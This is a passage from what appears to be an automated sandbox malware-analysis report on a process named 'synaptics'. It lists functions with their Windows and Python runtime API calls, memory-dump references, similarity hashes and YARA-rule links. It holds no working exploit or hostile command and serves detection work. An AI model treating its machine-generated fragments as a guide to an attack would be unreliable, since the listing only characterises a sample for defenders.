                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fileno_isatty
                                                                                                                                                                                                      • String ID: <stdin>$???
                                                                                                                                                                                                      • API String ID: 3177123343-1903793674
                                                                                                                                                                                                      • Opcode ID: 5208f675c3327d133ce294c444370560917496b0ccd93963a83e0dee0c96574a
                                                                                                                                                                                                      • Instruction ID: 068540dbe29392bc1c59d813cdcab547cdf3ae4ecb5509b8f9a787741f13f474
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5208f675c3327d133ce294c444370560917496b0ccd93963a83e0dee0c96574a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F08232B5312827EF0076B9AC00BE6725CAF0226FF01457AFC0CD1E00E726F6548AE5
                                                                                                                                                                                                      Function 73A84170 Relevance: 9.3, APIs: 6, Instructions: 275COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 73A84284
                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 73A842A1
                                                                                                                                                                                                      • VirtualQuery.KERNEL32(83000000,BD973097,0000001C,BD973097,?,?,?), ref: 73A84386
                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 73A843C3
                                                                                                                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 73A843E3
                                                                                                                                                                                                      • __FindPESection.LIBCMT ref: 73A843FD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2529200597-0
                                                                                                                                                                                                      • Opcode ID: 3646202d366343dc2d06f48174d31fa3ca7e0e4bf44b3bdde40397499061e0c5
                                                                                                                                                                                                      • Instruction ID: 675eeb67dae3a60862c9ae9949799fee222abcffdeaf280e4e53e6396aa53cfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3646202d366343dc2d06f48174d31fa3ca7e0e4bf44b3bdde40397499061e0c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60A1E272E012258FDB07CF99D9827DDB7B9EB48314F64012AD85AB7398EB35DC018B90
                                                                                                                                                                                                      Function 6C58AB10 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C58AB3A
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: memset.VCRUNTIME140()qXl,00000000,00000168,?,?), ref: 6C58DD44
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE5D
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE77
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: GetCurrentThreadId.KERNEL32 ref: 6C58DE97
                                                                                                                                                                                                        • Part of subcall function 6C58DCD0: PyThread_allocate_lock.PYTHON310 ref: 6C58DEA0
                                                                                                                                                                                                      • PyInterpreterState_New.PYTHON310 ref: 6C58AB8F
                                                                                                                                                                                                      • PyInterpreterState_Delete.PYTHON310(00000000), ref: 6C58ABAD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: State_Thread_allocate_lock$Interpreter$CurrentDeleteInitRuntimeThreadmemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 100581250-0
                                                                                                                                                                                                      • Opcode ID: 5ace4eff417b80b79176b00bc7e6dcde71155404233e37ab61163985882b6123
                                                                                                                                                                                                      • Instruction ID: 50b5b8ba98cc085bfdffe826004ea998571e880ad1e885f6b4938b830b7ed60c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ace4eff417b80b79176b00bc7e6dcde71155404233e37ab61163985882b6123
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A95114B1E012288BEB01CF59DC417AAB3B4EF9635CF04C265D8088B751FB31A989CBD1
                                                                                                                                                                                                      Function 73A85B85 Relevance: 9.1, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __telemetry_main_return_trigger.VCRUNTIME140(73A8EE98,00000010,?,73A85A93,73A90034,?), ref: 73A85BE4
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(73A8EE98,00000010,?,73A85A93,73A90034,?), ref: 73A85BF1
                                                                                                                                                                                                      • memmove.VCRUNTIME140(?,00000000,?,73A8EE98,00000010,?,73A85A93,73A90034,?), ref: 73A85C29
                                                                                                                                                                                                      • ___AdjustPointer.LIBCMT(?,?,?,73A85A93,73A90034,?), ref: 73A85C42
                                                                                                                                                                                                      • ___AdjustPointer.LIBCMT(?,?,?,73A8EE98,00000010,?,73A85A93,73A90034,?), ref: 73A85C65
                                                                                                                                                                                                      • memmove.VCRUNTIME140(?,00000000,?,73A8EE98,00000010,?,73A85A93,73A90034,?), ref: 73A85C6E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AdjustPointermemmove$__telemetry_main_return_triggerabort
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4025328792-0
                                                                                                                                                                                                      • Opcode ID: 01e2fa1fff6c02da6f12da08c1d34227eaebe7f0bc1f2a216e4ef3c60d7ac966
                                                                                                                                                                                                      • Instruction ID: 48aeb636763d603e3488956f86b318bc3259d7ac43903321ae3fe15810fe2538
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01e2fa1fff6c02da6f12da08c1d34227eaebe7f0bc1f2a216e4ef3c60d7ac966
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A41BCF2A012029FDF0B8F59C55ABE977B4AF18304F18446EEC07972A8E731D885CA80
                                                                                                                                                                                                      Function 6C5B9DB0 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • wcschr.VCRUNTIME140(?,0000003D), ref: 6C5B9DF1
                                                                                                                                                                                                      • PyUnicode_FromWideChar.PYTHON310(?,000000FF), ref: 6C5B9E04
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000), ref: 6C5B9E48
                                                                                                                                                                                                        • Part of subcall function 6C5B9960: _PyRuntimeState_Init.PYTHON310(?,6C77B000), ref: 6C5B998E
                                                                                                                                                                                                        • Part of subcall function 6C5B9960: _PyMem_RawWcsdup.PYTHON310(?,00000008), ref: 6C5B99F9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharDict_FromInitItemMem_RuntimeState_Unicode_WcsdupWidewcschr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 601630099-0
                                                                                                                                                                                                      • Opcode ID: 839dc10a8ede81dbd09d110e044f3b032f46355994783bf79a82115e3de8ed13
                                                                                                                                                                                                      • Instruction ID: 4c1ed405368e6590da9ed547546959e89d794894213db19dc878c3ad0e84c9f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 839dc10a8ede81dbd09d110e044f3b032f46355994783bf79a82115e3de8ed13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40314972E0011567C3109E69EC51D9A7BB8AFA2238B140365FC28E7B90EB31ED51C7D2
                                                                                                                                                                                                      Function 6C4A3A40 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 32158bb2d6186eb96e29d741569a593b7e8481e7e287bc48be9832f3daf9b283
                                                                                                                                                                                                      • Instruction ID: 5273d787b451710acc92afadc72ef7e757c2e10595e93932ce57b597f815e5a0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32158bb2d6186eb96e29d741569a593b7e8481e7e287bc48be9832f3daf9b283
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6031B470A00205ABCB10CE99DD80F9A7BB9EF65329F140268ED1887756F731ED16CBA1
                                                                                                                                                                                                      Function 6C58CA80 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • round.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,6C58CEA4), ref: 6C58CAB8
                                                                                                                                                                                                      • round.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,6C58CEA4), ref: 6C58CAFA
                                                                                                                                                                                                      • ceil.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,6C58CEA4), ref: 6C58CB2E
                                                                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,6C58CEA4), ref: 6C58CB54
                                                                                                                                                                                                      • ceil.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,6C58CEA4), ref: 6C58CB85
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ceilround$floor
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1250210367-0
                                                                                                                                                                                                      • Opcode ID: a60f9cc5ef0784e6134983516e8c1909fc1acf7669562d8855f80d0216814f3f
                                                                                                                                                                                                      • Instruction ID: b17a3bcc9b49715a881d34a9a01f61c9f10c37a6b02eae7e66fd8da1a8c3b69d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a60f9cc5ef0784e6134983516e8c1909fc1acf7669562d8855f80d0216814f3f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A31AE31D09E0C96CB02FEB49C820AEFB34FF57A96F44479ADC9539500EF3255A48386
                                                                                                                                                                                                      Function 73A8C6A4 Relevance: 9.1, APIs: 6, Instructions: 95COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 73A8DBD8: Replicator::operator[].LIBVCRUNTIME ref: 73A8DC15
                                                                                                                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 73A8C74A
                                                                                                                                                                                                        • Part of subcall function 73A8C2F2: DName::operator+.LIBCMT ref: 73A8C35D
                                                                                                                                                                                                        • Part of subcall function 73A8C2F2: DName::operator+.LIBCMT ref: 73A8C61B
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C705
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C711
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8C75E
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C76D
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8C779
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 955152517-0
                                                                                                                                                                                                      • Opcode ID: 23e730805ebe2ff80e8cd77c49fcc80bdcdb35073316f41c8313095716e8be26
                                                                                                                                                                                                      • Instruction ID: 26f1b8583e23556db1f3b689b4de71fbefcd0cec1de76337b35c14432efbbcd1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e730805ebe2ff80e8cd77c49fcc80bdcdb35073316f41c8313095716e8be26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE318FB56003049FDB0ACF64C592BEABBF9BF59340F10445EE68BA7394DB309544CB14
                                                                                                                                                                                                      Function 73A87480 Relevance: 9.1, APIs: 6, Instructions: 82stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___unDName.LIBVCRUNTIME(00000000,?,00000000,73A873C0,73A873D0,00002800), ref: 73A874AC
                                                                                                                                                                                                        • Part of subcall function 73A8E010: ___unDNameEx.LIBVCRUNTIME(?,00002800,73A873D0,73A873C0,00000000,00000000,?,?,73A874B1,00000000,?,00000000,73A873C0,73A873D0,00002800), ref: 73A8E029
                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-00000002), ref: 73A874EB
                                                                                                                                                                                                      • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000004,?,00000000), ref: 73A87508
                                                                                                                                                                                                      • InterlockedPushEntrySList.KERNEL32(?,?), ref: 73A8752D
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 73A87537
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 73A87540
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name___unfree$EntryInterlockedListPushmallocstrcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2809682464-0
                                                                                                                                                                                                      • Opcode ID: d66db129251fce19b03827735fbbefab9f6bbd9e62ec22099c40320d9cd8eb34
                                                                                                                                                                                                      • Instruction ID: a946a14fa04ccdf3c497fcbddb31549e995c9ca126d7e383e0849dd1598fe8b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66db129251fce19b03827735fbbefab9f6bbd9e62ec22099c40320d9cd8eb34
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF21FB32500205AFD7069F65CC46FDA7FB9EF4926472440AEE806EB245DB33D945CB90
                                                                                                                                                                                                      Function 6C5BBF20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000003E9,?,00000000,?), ref: 6C5BBFA0
                                                                                                                                                                                                        • Part of subcall function 6C5BBE90: PyUnicode_FromString.PYTHON310(?,?,00000000,?,6C5BBFCC), ref: 6C5BBE9F
                                                                                                                                                                                                        • Part of subcall function 6C5BBE90: _PyUnicode_FromId.PYTHON310(6C74E258,00000000,?,6C5BBFCC), ref: 6C5BBEB8
                                                                                                                                                                                                        • Part of subcall function 6C5BBE90: PyObject_VectorcallMethod.PYTHON310(00000000,?,80000002,00000000,?,00000000,?,6C5BBFCC), ref: 6C5BBED0
                                                                                                                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C5BC037
                                                                                                                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(... truncated,?), ref: 6C5BC06E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromUnicode_fputs$MethodObject_StringVectorcall__stdio_common_vsprintf
                                                                                                                                                                                                      • String ID: ... truncated$Pntl
                                                                                                                                                                                                      • API String ID: 3365782166-3318007974
                                                                                                                                                                                                      • Opcode ID: 17e940b978caa0b4a85bee849f3e8697614a1e655b81a3d1d789246cf0602649
                                                                                                                                                                                                      • Instruction ID: 5686018dccfc0cd23c9129303695b9721d1eda9d3939ef531acd383ed109a045
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17e940b978caa0b4a85bee849f3e8697614a1e655b81a3d1d789246cf0602649
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B151B0719052058FC740DF68CC90A4ABBF8BF85328F104768E868AB791D371FD85CB96
                                                                                                                                                                                                      Function 6C4F3A60 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 161COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
